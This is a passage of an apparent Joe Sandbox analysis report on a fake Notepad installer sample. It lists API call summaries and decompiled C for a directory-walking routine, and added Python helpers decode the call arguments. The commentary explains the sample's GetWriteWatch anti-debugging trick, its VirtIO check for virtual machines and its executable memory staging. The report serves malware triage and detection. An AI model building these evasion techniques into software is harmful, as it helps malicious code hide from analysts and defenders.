                                      • API ID: Path$AddressCombineCurrentEnvironmentExpandFolderHandleModuleProcProcessSpecialStrings
                                      • String ID: %ProgramW6432%$Virtio-Win\
                                      • API String ID: 949058988-231023017
                                      • Opcode ID: 9363cd130691b33e1e2c8f8fc0fa1919dda84874bf571e6e6c10045f62f996f6
                                      • Instruction ID: 1c22299fd3d4779d2faa6ec7812860ad4f40e760d3d423fc3fdc4cb9e751ed36
                                      • Opcode Fuzzy Hash: 9363cd130691b33e1e2c8f8fc0fa1919dda84874bf571e6e6c10045f62f996f6
                                      • Instruction Fuzzy Hash: 6701A27290131EAAEF609A60DC49FEB777EEB44711F0004A2B615E70D0DBB09AC5CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%
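
The numeric arguments Joe Sandbox prints in the API lines above are raw stack DWORDs, and several of them carry the point of the block. VirtualAlloc with type 0x00203000 is MEM_COMMIT|MEM_RESERVE|MEM_WRITE_WATCH followed by GetWriteWatch over the region: allocating write-watched pages and then asking how many were written is a documented anti-debugging trick, because a debugger, hooking DLL or emulator that touches the buffer changes the count the code expects. VerSetConditionMask is called with the 64-bit mask split over two DWORDs, then TypeMask and Condition, so (0,0,2,2) is VER_MAJORVERSION/VER_GREATER; the VerifyVersionInfoW mask 0x23 is VER_MINORVERSION|VER_MAJORVERSION|VER_SERVICEPACKMAJOR, the combination VersionHelpers.h uses for IsWindowsVersionOrGreater, and 0x11C is 284, the size of OSVERSIONINFOEXW. In the Virtio-Win block, CSIDL 0x26 is CSIDL_PROGRAM_FILES and %ProgramW6432% is the 64-bit Program Files directory as seen from a WOW64 process, so both directories are checked for the VirtIO guest driver package, a KVM/QEMU guest marker. The decoder below is an added triage helper, not Joe Sandbox code; the constant values are the ones from the Windows SDK headers and the input lines are copied from this report.

```python
"""Decode the hexadecimal arguments in the 'APIs' lines of this report into
SDK constant names.  This is an added triage helper, not Joe Sandbox code;
the constant values are those from the Windows SDK headers (winnt.h,
memoryapi.h, shlobj.h) and the sample lines are copied from the report."""
import re

MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT",
             0x8000: "MEM_RELEASE", 0x100000: "MEM_TOP_DOWN",
             0x200000: "MEM_WRITE_WATCH", 0x20000000: "MEM_LARGE_PAGES"}
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x100: "PAGE_GUARD"}
VER_TYPE = {0x01: "VER_MINORVERSION", 0x02: "VER_MAJORVERSION", 0x04: "VER_BUILDNUMBER",
            0x08: "VER_PLATFORMID", 0x10: "VER_SERVICEPACKMINOR",
            0x20: "VER_SERVICEPACKMAJOR", 0x40: "VER_SUITENAME", 0x80: "VER_PRODUCT_TYPE"}
VER_COND = {1: "VER_EQUAL", 2: "VER_GREATER", 3: "VER_GREATER_EQUAL",
            4: "VER_LESS", 5: "VER_LESS_EQUAL"}
CSIDL = {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA",
         0x26: "CSIDL_PROGRAM_FILES", 0x2A: "CSIDL_PROGRAM_FILESX86"}

# Lines copied from the report blocks above (constructed input for the demo).
REPORT_LINES = [
    "• VirtualAlloc.KERNEL32(00000000,00004000,00003000,00000004), ref: 006EA05E",
    "• VirtualAlloc.KERNEL32(00000000,01000000,00203000,00000004), ref: 006EA074",
    "• VirtualFree.KERNEL32(?,00000000,00008000), ref: 006EA085",
    "• GetWriteWatch.KERNEL32(00000000,00000000,00001000,?,?,?), ref: 006EA0AB",
    "• VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000002), ref: 006E6930",
    "• VerifyVersionInfoW.KERNEL32(00000000,00000002,00000000), ref: 006E6949",
    "• VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 006E955D",
    "• ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104), ref: 006EC75B",
    "• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000000), ref: 006EC770",
]

CALL_RE = re.compile(r"(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)")
HEX_RE = re.compile(r"[0-9A-Fa-f]+")

def flags(value, table):
    """Expand a bitmask into SDK names, keeping any unknown bits as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = sum(bit for bit in table if value & bit)
    if value & ~known:
        names.append(hex(value & ~known))
    return "|".join(names) or "0"

def parse_call(line):
    """Split 'Api.MODULE(arg,arg,...), ref: ADDR' into its parts.  Arguments the
    sandbox could not resolve are printed as '?' and become None here."""
    m = CALL_RE.search(line)
    if not m:
        return None
    api, module, args, ref = m.groups()
    nums = [int(a, 16) if HEX_RE.fullmatch(a.strip()) else None for a in args.split(",")]
    return api, module, nums, ref

def decode(line):
    """Return a readable decoding of one report line, or None if nothing to say."""
    parsed = parse_call(line)
    if parsed is None:
        return None
    api, _, n, ref = parsed
    n += [None] * (6 - len(n))           # pad so positional checks are safe
    if api == "VirtualAlloc" and n[2] is not None and n[3] is not None:
        note = ""
        if n[2] & 0x200000:              # MEM_WRITE_WATCH
            note = " <- MEM_WRITE_WATCH pages: GetWriteWatch anti-debug pattern"
        size = f"{n[1]:#x}" if n[1] is not None else "?"
        return (f"{ref}: VirtualAlloc size={size} type={flags(n[2], MEM_FLAGS)} "
                f"protect={flags(n[3], PAGE_PROTECT)}{note}")
    if api == "VirtualFree" and n[2] is not None:
        return f"{ref}: VirtualFree type={flags(n[2], MEM_FLAGS)}"
    if api == "GetWriteWatch" and n[0] is not None and n[2] is not None:
        reset = "WRITE_WATCH_FLAG_RESET" if n[0] & 1 else "no reset"
        return f"{ref}: GetWriteWatch {reset} region={n[2]:#x} bytes"
    if api == "VerSetConditionMask" and n[2] is not None and n[3] is not None:
        # The 64-bit mask is passed as two DWORDs, then TypeMask, then Condition.
        return f"{ref}: VerSetConditionMask {flags(n[2], VER_TYPE)} {VER_COND.get(n[3], hex(n[3]))}"
    if api == "VerifyVersionInfoW" and n[1] is not None:
        return f"{ref}: VerifyVersionInfoW typemask={flags(n[1], VER_TYPE)}"
    if api == "SHGetSpecialFolderPathW" and n[2] is not None:
        return f"{ref}: SHGetSpecialFolderPathW csidl={CSIDL.get(n[2], hex(n[2]))}"
    return None

def triage(lines):
    """Decode every line that carries a constant we know how to name."""
    return [d for d in map(decode, lines) if d is not None]

if __name__ == "__main__":
    print("\n".join(triage(REPORT_LINES)))
```

Run it on a whole report and grep the output for MEM_WRITE_WATCH, PAGE_EXECUTE_READWRITE or CSIDL values you care about; lines whose arguments are all "?" simply decode to nothing.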

                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,006EB5D1), ref: 006E98F3
                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E98FF
                                      • GetCurrentProcess.KERNEL32(00000000,?,?,006EB5D1), ref: 006E9912
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressCurrentHandleModuleProcProcess
                                      • String ID: IsWow64Process$kernel32.dll
                                      • API String ID: 4190356694-3024904723
                                      • Opcode ID: fe531d5a9f40b6b69e5adf7b66dd2f253aad707ed1a1dfa9e18669d0f970cb59
                                      • Instruction ID: 46f402923884a4485bd78926294a0b03cdb42049fbaec55d3fa978599b265948
                                      • Opcode Fuzzy Hash: fe531d5a9f40b6b69e5adf7b66dd2f253aad707ed1a1dfa9e18669d0f970cb59
                                      • Instruction Fuzzy Hash: ABF01CB1A02309EBDB108BA6ED0E7EA37EEAF0070BF042459E505D2290D7B8C640CA21
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 60%
                                      			// Decompiler output (Joe Sandbox); the comments on the constants are editorial.
                                      			// Shape: takes a path, makes it absolute into a 0x104-byte (MAX_PATH) buffer,
                                      			// appends "\*", allocates a handle block and starts a directory search. That is
                                      			// consistent with a Win32 opendir()-style routine, the kind of helper a stealer
                                      			// uses to walk profile directories. errno values written through the pointer
                                      			// returned by L0040A388(): 0x16 = EINVAL, 2 = ENOENT, 0xC = ENOMEM.
                                      			E00409D60() {
                                      				void* _t37;
                                      				unsigned int _t42;
                                      				void* _t43;
                                      				unsigned int _t46;
                                      				void* _t48;
                                      				void* _t49;
                                      				intOrPtr _t50;
                                      				unsigned int _t55;
                                      				void* _t58;
                                      				unsigned int _t59;
                                      				signed int _t63;
                                      				signed char _t67;
                                      				signed int _t70;
                                      				signed int _t72;
                                      				void* _t74;
                                      				signed int _t76;
                                      				void* _t82;
                                      				void* _t86;
                                      				void* _t87;
                                      				void* _t89;
                                      				void** _t90;
                                      
                                      				_t90 = _t89 - 0x12c;
                                      				_t37 = _t90[0x50];                     // first argument: the path string
                                      				if(_t37 == 0) {
                                      					L0040A388();                       // returns the errno slot (the decompiler reuses _t37 for it)
                                      					_t87 = 0;
                                      					 *_t37 = 0x16;                     // errno = EINVAL (22): NULL path
                                      					goto L20;
                                      				} else {
                                      					if( *_t37 == 0) {
                                      						L0040A388();
                                      						 *_t37 = 2;                    // errno = ENOENT (2): empty path
                                      						return 0;
                                      					} else {
                                      						_t86 =  &(_t90[7]);            // local buffer for the absolute path
                                      						_t90[2] = 0x104;               // 0x104 = MAX_PATH
                                      						_t90[1] = _t37;
                                      						 *_t90 = _t86;
                                      						L0040A380();                   // three-argument call (buf, path, MAX_PATH): consistent with _fullpath()
                                      						_t74 = _t86;
                                      						if(_t90[7] == 0) {
                                      							goto L8;
                                      							L8:
                                      							_t63 =  *_t74;
                                      							_t74 = _t74 + 4;
                                      							_t42 = _t63 - 0x01010101 &  !_t63 & 0x80808080; // word-at-a-time zero-byte test: an inlined strlen()
                                      							if(_t42 == 0) {
                                      								goto L8;
                                      							} else {
                                      								if((_t42 & 0x00008080) == 0) {
                                      									_t42 = _t42 >> 0x10;
                                      									_t74 = _t74 + 2;
                                      								}
                                      								_t43 = _t74;
                                      								asm("sbb eax, 0x3");
                                      							}
                                      						} else {
                                      							do {
                                      								_t70 =  *_t74;
                                      								_t74 = _t74 + 4;
                                      								_t55 = _t70 - 0x01010101 &  !_t70 & 0x80808080;
                                      							} while (_t55 == 0);
                                      							if((_t55 & 0x00008080) == 0) {
                                      								_t55 = _t55 >> 0x10;
                                      								_t74 = _t74 + 2;
                                      							}
                                      							asm("sbb edx, 0x3");
                                      							_t82 = _t74 - _t86;                          // strlen(buffer)
                                      							_t72 =  *(_t90 + _t82 + 0x1b) & 0x000000ff;  // last character of the path
                                      							_t43 = _t86 + _t82;
                                      							if(_t72 != 0x2f && _t72 != 0x5c) {           // neither '/' nor '\\'
                                      								 *_t43 = 0x5c;                           // append '\\'
                                      								_t43 = _t86 + _t82 + 1;
                                      							}
                                      						}
                                      						_t58 = _t86;
                                      						 *_t43 = 0x2a;                             // append '*': the pattern is now "<dir>\*"
                                      						goto L12;
                                      						L15:
                                      						asm("sbb ebx, 0x3");
                                      						_t59 = _t58 - _t86;                        // length of "<dir>\*"
                                      						 *_t90 = _t59 + 0x11c;                     // handle block: 0x118-byte header followed by the pattern
                                      						_t48 = malloc(??);
                                      						_t87 = _t48;
                                      						if(_t48 == 0) {
                                      							L0040A388();
                                      							 *_t48 = 0xc;                          // errno = ENOMEM (12)
                                      						} else {
                                      							_t67 = _t59 + 1;
                                      							_t49 = _t48 + 0x118;
                                      							if(_t67 < 4) {
                                      								if(_t67 != 0) {
                                      									 *_t49 =  *_t86 & 0x000000ff;
                                      									if((_t67 & 0x00000002) != 0) {
                                      										 *((short*)(_t49 + _t67 - 2)) =  *(_t86 + _t67 - 2) & 0x0000ffff;
                                      									}
                                      								}
                                      							} else {
                                      								 *((intOrPtr*)(_t49 + _t67 - 4)) =  *((intOrPtr*)(_t90 + _t67 + 0x18));
                                      								_t49 = memcpy(_t49, _t86, _t59 >> 2 << 2);
                                      								_t90 =  &(_t90[3]);
                                      							}
                                      							_t50 = E00409BB0(_t49, _t87);          // start the search on the pattern stored at +0x118
                                      							 *((intOrPtr*)(_t87 + 0x110)) = _t50;  // search handle kept at +0x110
                                      							if(_t50 == 0xffffffff) {               // -1 (INVALID_HANDLE_VALUE): release the block, return NULL
                                      								 *_t90 = _t87;
                                      								_t87 = 0;
                                      								E00408660();
                                      							} else {
                                      								 *_t87 = 0;
                                      								 *(_t87 + 0x114) = 0;              // enumeration state at +0x114 starts at 0
                                      								 *((short*)(_t87 + 4)) = 0x110;
                                      							}
                                      						}
                                      						L20:
                                      						return _t87;
                                      						goto L30;
                                      						L12:
                                      						_t76 =  *_t58;
                                      						_t58 = _t58 + 4;
                                      						_t17 = _t76 - 0x1010101; // -16842967
                                      						_t46 = _t17 &  !_t76 & 0x80808080;
                                      						if(_t46 == 0) {
                                      							goto L12;
                                      						} else {
                                      							if((_t46 & 0x00008080) == 0) {
                                      								_t46 = _t46 >> 0x10;
                                      								_t58 = _t58 + 2;
                                      							}
                                      						}
                                      						goto L15;
                                      					}
                                      				}
                                      				L30:
                                      			}

                                      0x00409eb3
                                      0x00409eb3
                                      0x00409e97
                                      0x00409eb7
                                      0x00409ec3
                                      0x00000000
                                      0x00409e24
                                      0x00409e24
                                      0x00409e26
                                      0x00409e29
                                      0x00409e33
                                      0x00409e38
                                      0x00000000
                                      0x00409e3a
                                      0x00409e3f
                                      0x00409e41
                                      0x00409e44
                                      0x00409e44
                                      0x00409e3f
                                      0x00000000
                                      0x00409e38
                                      0x00409d7c
                                      0x00000000

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _errno$_fullpathmalloc
                                      • String ID:
                                      • API String ID: 1031002091-0
                                      • Opcode ID: ce795a2635ad3b05727b3c67cbe4d25af37f8b6b50032a876bba419dd9c408c1
                                      • Instruction ID: 1e137775dab4e1dbd69cb6b5fddc78eb9f796be5212f8472db7a0612a04b62d8
                                      • Opcode Fuzzy Hash: ce795a2635ad3b05727b3c67cbe4d25af37f8b6b50032a876bba419dd9c408c1
                                      • Instruction Fuzzy Hash: 1641E0712046098BE714DE24C8467AB77D1EF82308F08447ED9849B3D6EB7E9D4AC78A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetSystemInfo.KERNEL32(?), ref: 006E9DD5
                                      • GetModuleHandleExW.KERNEL32(00000004,006E9C88,?), ref: 006E9DE9
                                      • GetCurrentProcess.KERNEL32(?,?,0000000C), ref: 006E9E00
                                      • GetModuleInformation.PSAPI(00000000), ref: 006E9E07
                                      • VirtualQuery.KERNEL32(?,00000000,0000001C,006E9763,00000000), ref: 006E9E22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Module$CurrentHandleInfoInformationProcessQuerySystemVirtual
                                      • String ID:
                                      • API String ID: 1573062435-0
                                      • Opcode ID: 65946006f690ca50859a8fe7739fe2d30fb2ff0be98fa7f717fef7f7346bf8aa
                                      • Instruction ID: 95d8b37ec903cc192389f10fc7bb1c86a7d13e2d0bec66e6fea168b5bd6a01b0
                                      • Opcode Fuzzy Hash: 65946006f690ca50859a8fe7739fe2d30fb2ff0be98fa7f717fef7f7346bf8aa
                                      • Instruction Fuzzy Hash: 2E21C372A0024AABEF20DBEACC95BFE77ABEF44711F040015E612E22D1D6349881CB71
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: mbstowcssetlocalewcstombs
                                      • String ID:
                                      • API String ID: 4174842464-0
                                      • Opcode ID: 708dbc9e281e25611127d1e5353e2144fde7828d0e90fe5cc51af51b514d4d15
                                      • Instruction ID: d6f74d08e4f01a8e68750589103c137a535fab5d44ab896d8436be5a42cd2b4e
                                      • Opcode Fuzzy Hash: 708dbc9e281e25611127d1e5353e2144fde7828d0e90fe5cc51af51b514d4d15
                                      • Instruction Fuzzy Hash: 083109709187159ECB10AF65C1546AEBBF0FF84344F00883EE888A7351E7789955DB86
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: fwrite$strlen
                                      • String ID:
                                      • API String ID: 3341123317-0
                                      • Opcode ID: 4e5357ea7d3dd1594e5c5bafb02f6fd86f0f3a86a191ce34ea18af2187bcb2dc
                                      • Instruction ID: d76fec5d836d608524c0ba963f2085c4795d69c9ab879dabfc721c3c12d35278
                                      • Opcode Fuzzy Hash: 4e5357ea7d3dd1594e5c5bafb02f6fd86f0f3a86a191ce34ea18af2187bcb2dc
                                      • Instruction Fuzzy Hash: 0021E6B19083158FD710EF25C48424FBFE4BF94358F05892EE8D8A7351E6799A898F87
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memcpy.NTDLL(?,006E2EB5,0000006C,?,00000000), ref: 006E360C
                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,?,?,00000000), ref: 006E364D
                                      • memcpy.NTDLL(00000000,006E2E49,?,?,?,00000000), ref: 006E3665
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcpy$AllocVirtual
                                      • String ID: !Rex$l
                                      • API String ID: 1089091998-3692501399
                                      • Opcode ID: 1cc857d5b94aef8dff741ced3d15a0b77fee593e31a36ee1e8f0f9c7e0ea71f9
                                      • Instruction ID: 50a9648d64d6f9d1d4af9d7f338b15251cc2ae708d407b52a2fa967bde54ab36
                                      • Opcode Fuzzy Hash: 1cc857d5b94aef8dff741ced3d15a0b77fee593e31a36ee1e8f0f9c7e0ea71f9
                                      • Instruction Fuzzy Hash: DF019275E013946BCB109FBA9C8AE9E37AA9B41754F104129F519AB783D2648904CB15
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,000002CC,00001000,00000004), ref: 006E9670
                                      • memset.NTDLL ref: 006E967F
                                      • GetCurrentThread.KERNEL32 ref: 006E968E
                                      • GetThreadContext.KERNEL32(00000000), ref: 006E9695
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006E96BD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ThreadVirtual$AllocContextCurrentFreememset
                                      • String ID:
                                      • API String ID: 1864654505-0
                                      • Opcode ID: 8c53517c41b30e2127e0d274d567ebaa011fb10f7b81bdc5092a1179afd3ea74
                                      • Instruction ID: 520f5d08bd6d97fe1f634a382e81365f90cde471d9c0db271a3837c0c2595d47
                                      • Opcode Fuzzy Hash: 8c53517c41b30e2127e0d274d567ebaa011fb10f7b81bdc5092a1179afd3ea74
                                      • Instruction Fuzzy Hash: 0FF0A471703785AFEB305E629C88FABB76EEF41795B00453FF64541150E6715881CE74
                                      Uniqueness

                                      Uniqueness Score: -1.00%
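
                                      The two memory-management summaries above (VirtualAlloc with flProtect 0x40 at 006E364D bracketed by memcpy calls in the 006E0000 dump, and VirtualAlloc with flProtect 0x04 followed by GetCurrentThread, GetThreadContext and VirtualFree with 0x8000 at 006E9670..006E96BD) are easier to read once the raw hex arguments are decoded against winnt.h. The Python below is an added triage helper written for this page; it is not part of the Joe Sandbox report, the IDA plugin, or the sample. It parses API reference lines in the report's "Api.Module(args), ref: ADDR" format, decodes the allocation-type and page-protection masks, and flags an executable allocation that is followed within a few calls by a memory copy, which is the shellcode-staging shape. The line regex, the three-call look-ahead window and the set of copy APIs are assumptions of this example; the sample lines are copied verbatim from the two summaries above and labelled as constructed input.

```python
import re

# Constructed sample input: the API reference lines of two function summaries
# copied from this report (the memcpy/VirtualAlloc function around 006E360C and
# the VirtualAlloc/GetThreadContext/VirtualFree function around 006E9670).
SAMPLE_LINES = [
    "memcpy.NTDLL(?,006E2EB5,0000006C,?,00000000), ref: 006E360C",
    "VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,?,?,00000000), ref: 006E364D",
    "memcpy.NTDLL(00000000,006E2E49,?,?,?,00000000), ref: 006E3665",
    "VirtualAlloc.KERNEL32(00000000,000002CC,00001000,00000004), ref: 006E9670",
    "memset.NTDLL ref: 006E967F",
    "GetCurrentThread.KERNEL32 ref: 006E968E",
    "GetThreadContext.KERNEL32(00000000), ref: 006E9695",
    "VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006E96BD",
]

# winnt.h constants needed to decode the arguments above.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT",
             0x8000: "MEM_RELEASE", 0x00400000: "MEM_TOP_DOWN"}
PAGE_FLAGS = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
              0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
              0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_EXECUTE_ANY = 0xF0  # any of the four executable protections
# Assumed set of "copy into memory" APIs for the look-ahead heuristic.
COPY_APIS = {"memcpy", "memmove", "RtlMoveMemory", "RtlCopyMemory", "WriteProcessMemory"}

# Assumed line format: "Api.Module(arg,arg,...), ref: ADDR" or, when no argument
# was resolved, "Api.Module ref: ADDR".
LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")


def parse_call(line):
    """Parse one API reference line into a dict, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    raw = m.group("args")
    args = [] if raw is None else [a.strip() for a in raw.split(",")]
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


def arg_value(args, index):
    """Hex argument as int; None when absent or unresolved ('?' in the report)."""
    if index >= len(args) or args[index] == "?":
        return None
    return int(args[index], 16)


def flag_names(value, table):
    """Decode a bitmask into winnt.h names, keeping unknown bits as hex."""
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(bit for bit in table if value & bit)
    if rest:
        names.append(hex(rest))
    return "|".join(names) if names else "0"


def triage(lines):
    """Return (ref, finding) pairs for the memory-related calls in the lines."""
    calls = [c for c in map(parse_call, lines) if c]
    findings = []
    for i, c in enumerate(calls):
        if c["api"] == "VirtualAlloc":
            size = arg_value(c["args"], 1)
            alloc_type = arg_value(c["args"], 2)
            protect = arg_value(c["args"], 3)
            text = "VirtualAlloc size=%s type=%s protect=%s" % (
                "?" if size is None else hex(size),
                flag_names(alloc_type, MEM_FLAGS), flag_names(protect, PAGE_FLAGS))
            if protect is not None and protect & PAGE_EXECUTE_ANY:
                # Executable memory requested up front. A copy into it within the
                # next few calls is the "stage shellcode, then jump" shape.
                copied = any(n["api"] in COPY_APIS for n in calls[i + 1:i + 4])
                text += "; EXECUTABLE allocation" + (" followed by a memory copy" if copied else "")
            findings.append((c["ref"], text))
        elif c["api"] == "VirtualFree":
            findings.append((c["ref"], "VirtualFree type=%s" %
                             flag_names(arg_value(c["args"], 2), MEM_FLAGS)))
        elif c["api"] == "GetThreadContext":
            # GetCurrentThread just before it means the code reads its own
            # register state rather than that of another thread.
            own = any(p["api"] == "GetCurrentThread" for p in calls[max(0, i - 2):i])
            findings.append((c["ref"], "GetThreadContext on %s thread" % ("own" if own else "another")))
    return findings


def executable_allocs(lines):
    """Refs of VirtualAlloc calls that request an executable protection."""
    return [ref for ref, text in triage(lines) if "EXECUTABLE" in text]


if __name__ == "__main__":
    for ref, text in triage(SAMPLE_LINES):
        print("%08X  %s" % (ref, text))
```

Run against the sample lines, the allocation at 006E364D decodes to MEM_COMMIT with PAGE_EXECUTE_READWRITE and is reported as an executable allocation followed by a memory copy, while the 0x2CC-byte PAGE_READWRITE allocation at 006E9670 is not flagged: 0x2CC is the size of an x86 CONTEXT structure, consistent with the GetThreadContext call that follows it and the VirtualFree with MEM_RELEASE that tears it down.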

                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,006EF81B,l-n,006EF535,006EF52D,006FADB0,006EF535,006E2D6C), ref: 006EF82B
                                      • InterlockedCompareExchange.KERNEL32(006EF539,00000000,00000000), ref: 006EF83D
                                      • SetEvent.KERNEL32(00000000,?,006EF81B,l-n,006EF535,006EF52D,006FADB0,006EF535,006E2D6C), ref: 006EF84E
                                      • CloseHandle.KERNEL32(00000000,?,006EF81B,l-n,006EF535,006EF52D,006FADB0,006EF535,006E2D6C), ref: 006EF85A
                                      • WaitForSingleObject.KERNEL32(006EF535,000000FF,?,006EF81B,l-n,006EF535,006EF52D,006FADB0,006EF535,006E2D6C), ref: 006EF865
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Event$CloseCompareCreateExchangeHandleInterlockedObjectSingleWait
                                      • String ID:
                                      • API String ID: 4206309166-0
                                      • Opcode ID: c42393f65fe182d879329b4f8032b6ff9262714a51bdcda57c369c11702f9d60
                                      • Instruction ID: c4d5219d5a4353f49797713c330cb31d5a2671f6027e20e77cfa6ee639527777
                                      • Opcode Fuzzy Hash: c42393f65fe182d879329b4f8032b6ff9262714a51bdcda57c369c11702f9d60
                                      • Instruction Fuzzy Hash: AEF08235104305BBDB101FA5DC59BA67F6DEB04765F105815FE0A9A1D0D6709440CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
